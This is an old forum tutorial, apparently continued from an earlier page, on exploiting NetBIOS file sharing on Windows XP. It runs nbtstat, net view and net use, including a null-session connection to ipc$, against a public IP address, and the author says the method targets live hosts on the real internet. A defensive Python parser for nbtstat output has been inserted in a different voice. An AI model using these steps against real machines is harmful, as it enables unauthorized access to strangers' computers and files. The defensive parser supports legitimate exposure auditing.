QUICK AND SIMPLE NETBIOS EXPLOITATION WITH WINDOWS XP CONT...
Just a side note - we scanned for port 445 too, as it is possible to have port
139 open but not have the file sharing service running. If port 445 is
open as well as 139 it usually means that the file sharing service is
up and running, which can save us some time when choosing which host to
attack.
Fire up the command prompt again and use the in-built NBTSTAT utility
that comes with Windows. The command we give is:
nbtstat -a [ip address]
Like so:
Code:
H:\>nbtstat -a 81.32.12.240
Local Area Connection:
Node IpAddress: [192.168.2.3] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
MASSAMA <00> UNIQUE Registered
MASSAMA <20> UNIQUE Registered
GRUPO_TRABAJO <00> GROUP Registered
GRUPO_TRABAJO <1E> GROUP Registered
MAC Address = 00-53-45-00-00-00
So what is all this telling us?
What we are mainly looking at is the 'TYPE' status; we want to see
<20> there. A common misconception is that if you can connect to
a box in the above-mentioned manner, file sharing is enabled. This
is not always the case. When we have connected we need to see the
<20> there to tell us File Sharing is enabled; if it is not there,
and you are at a level that means you are reading this, you may as
well move on to another box.
The following table lists all the possible entries you can get:
Code:
<computername> 00 U Workstation Service
<computername> 01 U Messenger Service
<.._MSBROWSE_> 01 G Master Browser
<computername> 03 U Messenger Service
<computername> 06 U RAS Server Service
<computername> 1F U NetDDE Service
<computername> 20 U File Server Service
<computername> 21 U RAS Client Service
<computername> 22 U Exchange Interchange
<computername> 23 U Exchange Store
<computername> 24 U Exchange Directory
<computername> 30 U Modem Sharing Server Service
<computername> 31 U Modem Sharing Client Service
<computername> 43 U SMS Client Remote Control
<computername> 44 U SMS Admin Remote Control Tool
<computername> 45 U SMS Client Remote Chat
<computername> 46 U SMS Client Remote Transfer
<computername> 4C U DEC Pathworks TCP/IP Service
<computername> 52 U DEC Pathworks TCP/IP Service
<computername> 87 U Exchange MTA
<computername> 6A U Exchange IMC
<computername> BE U Network Monitor Agent
<computername> BF U Network Monitor Application
<computername> 03 U Messenger Service
<domain> 00 G Domain Name
<domain> 1B U Domain Master Browser
<domain> 1C G Domain Controllers
<domain> 1D U Master Browser
<domain> 1E G Browser Service Elections
<INet~Services> 1C G Internet Information Server
<IS~computername> 00 U Internet Information Server
As you can see there are many different services that we can connect
to. The scope of this paper is File Sharing though, so we will just
concentrate on the <20> field.
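The name table and the suffix list above are easy to misread by hand, so here is an added example (my own code, not part of the original tutorial) that parses saved `nbtstat -a` output and applies the page's suffix table to it. It is written from the auditing side: an administrator can feed it the output collected from their own hosts and see which ones advertise the <20> File Server Service. The second sample below (WKSTN01 / LABGROUP) is constructed for illustration; the first is the output shown on the page.

```python
import re

# Suffix/type -> service, taken from the table on the page. Keyed on both the
# hex suffix and the name type because <00> differs for UNIQUE and GROUP names.
NETBIOS_SUFFIXES = {
    ("00", "UNIQUE"): "Workstation Service",
    ("01", "UNIQUE"): "Messenger Service",
    ("01", "GROUP"): "Master Browser",
    ("03", "UNIQUE"): "Messenger Service",
    ("06", "UNIQUE"): "RAS Server Service",
    ("1F", "UNIQUE"): "NetDDE Service",
    ("20", "UNIQUE"): "File Server Service",
    ("21", "UNIQUE"): "RAS Client Service",
    ("00", "GROUP"): "Domain Name",
    ("1B", "UNIQUE"): "Domain Master Browser",
    ("1C", "GROUP"): "Domain Controllers",
    ("1D", "UNIQUE"): "Master Browser",
    ("1E", "GROUP"): "Browser Service Elections",
}

# One row of the "NetBIOS Remote Machine Name Table": name <suffix> type status.
_ROW = re.compile(r"^\s*(.+?)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)", re.M)
_MAC = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})")


def parse_nbtstat(output):
    """Return the name table rows and the MAC address found in nbtstat -a output."""
    rows = [{"name": m.group(1), "suffix": m.group(2).upper(),
             "type": m.group(3), "status": m.group(4)} for m in _ROW.finditer(output)]
    mac = _MAC.search(output)
    return {"names": rows, "mac": mac.group(1) if mac else None}


def describe(row):
    """Map a parsed row to the service it announces, per the page's suffix table."""
    return NETBIOS_SUFFIXES.get((row["suffix"], row["type"]), "Unknown/other")


def file_sharing_advertised(parsed):
    """True only when a Registered UNIQUE <20> entry (File Server Service) is present."""
    return any(r["suffix"] == "20" and r["type"] == "UNIQUE"
               and r["status"].lower() == "registered" for r in parsed["names"])


def summarize(output):
    """Condense one host's nbtstat output into the fields an exposure report needs."""
    parsed = parse_nbtstat(output)
    pick = lambda suffix, kind: next((r["name"] for r in parsed["names"]
                                      if r["suffix"] == suffix and r["type"] == kind), None)
    return {"computer": pick("00", "UNIQUE"), "workgroup": pick("00", "GROUP"),
            "mac": parsed["mac"], "file_sharing": file_sharing_advertised(parsed),
            "services": sorted({describe(r) for r in parsed["names"]})}


# Sample 1: the nbtstat output reproduced on the page.
PAGE_OUTPUT = """\
Local Area Connection:
Node IpAddress: [192.168.2.3] Scope Id: []
           NetBIOS Remote Machine Name Table
       Name               Type         Status
    ---------------------------------------------
    MASSAMA        <00>  UNIQUE      Registered
    MASSAMA        <20>  UNIQUE      Registered
    GRUPO_TRABAJO  <00>  GROUP       Registered
    GRUPO_TRABAJO  <1E>  GROUP       Registered
    MAC Address = 00-53-45-00-00-00
"""

# Sample 2 (constructed): a host that answers nbtstat but does not advertise <20>.
NO_SHARE_OUTPUT = """\
Local Area Connection:
Node IpAddress: [192.168.2.3] Scope Id: []
           NetBIOS Remote Machine Name Table
       Name               Type         Status
    ---------------------------------------------
    WKSTN01        <00>  UNIQUE      Registered
    WKSTN01        <03>  UNIQUE      Registered
    LABGROUP       <00>  GROUP       Registered
    MAC Address = 02-00-00-00-00-01
"""

if __name__ == "__main__":
    for label, text in (("page sample", PAGE_OUTPUT), ("constructed", NO_SHARE_OUTPUT)):
        s = summarize(text)
        print(f"{label}: {s['computer']} in {s['workgroup']} ({s['mac']}), "
              f"file sharing advertised: {s['file_sharing']}, services: {s['services']}")
```

The check deliberately requires the status to be Registered as well as the suffix to be <20>, because a name in any other state is not a live File Server Service registration and should not be counted as exposure.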
So, after discovering we can ‘nbtstat’ to another box and we have
established that the File Sharing Service is running we want to see
what shares are available on a box.
For this we again use an inbuilt command in Windows. The ‘net’ command.
Or more specifically the ‘net view’ command.
Code:
H:\>net view \\81.32.12.240
System error 5 has occurred.
Access is denied.
Whoops. OK, so this guy is not as open as he first appeared and we can't
get a list of his shares. This may be because he is not running any
shares or because he has locked down his box and prevented it from
displaying his shares to the casual internet user.
I have put this in to this paper for a few reasons. The first being, if
you scour the internet looking for NetBIOS tutorials, you will find
hundreds that have been written and performed on an internal LAN, which
is conveniently set up to allow anonymous access to the File Sharing
service. This paper is using live IP addresses in real life scenarios
on the real internet, not a pre-constructed LAN... hence you won't
always be successful first time!
Another reason I left it in is to show that just because you can see
the NetBIOS table and it has the <20> File Sharing service
running, does not mean you can connect to it!
The final reason is to demonstrate that you will not always be
successful with this attack and it can take a lot of trial and error. I
have given lessons in the past that have gone on for in excess of 60
minutes before we have found an open and suitable host.
There are ways to gain access to secured shares but that is in the
scope of the Advanced NetBIOS paper which will follow this one.
Right, so the last command would not let us get a list of the shares
available... but that does not mean there aren't any. We can try to
connect to the most obvious ones anyway and see what happens.
We stick with the inbuilt ‘net’ command only this time we use the ‘net
use’ command.
Code:
H:\>net use \\81.32.12.240\ipc$
The password is invalid for \\81.32.12.240\ipc$.
Enter the user name for '81.32.12.240': administrator
Enter the password for 81.32.12.240:
System error 1326 has occurred.
Logon failure: unknown user name or bad password.
OK, we don't know the password... there are heaps of password crackers
for NetBIOS out there, which I consider to be more advanced, so they will be
included in the next paper.
We do have the option of connecting via a ‘null’ session however. A
null session does not require a user name or password and will usually
allow a connection attempt.
To signify a null connection attempt we use the "" /U:"" switch at the
end of our command.
Try the following:
Code:
H:\>net use \\81.32.12.240\ipc$ "" /U:""
The command completed successfully.
Now try the 'net view' command again to see if we can get a list of the
shares. This may or may not be successful, but more often than not it
will fail. (If you are successful, read on further down the page to find
what to do next!)
Original Tutorial by
nokia for TheTAZZone-TAZForum
Originally posted on September 20th, 2006 here
Do not use, republish, in whole or in part, without the consent of
the Author. TheTAZZone policy is that Authors retain the rights to the
work they submit and/or post...we do not sell, publish, transmit, or
have the right to give permission for such...TheTAZZone merely retains
the right to use, retain, and publish submitted work within its
Network.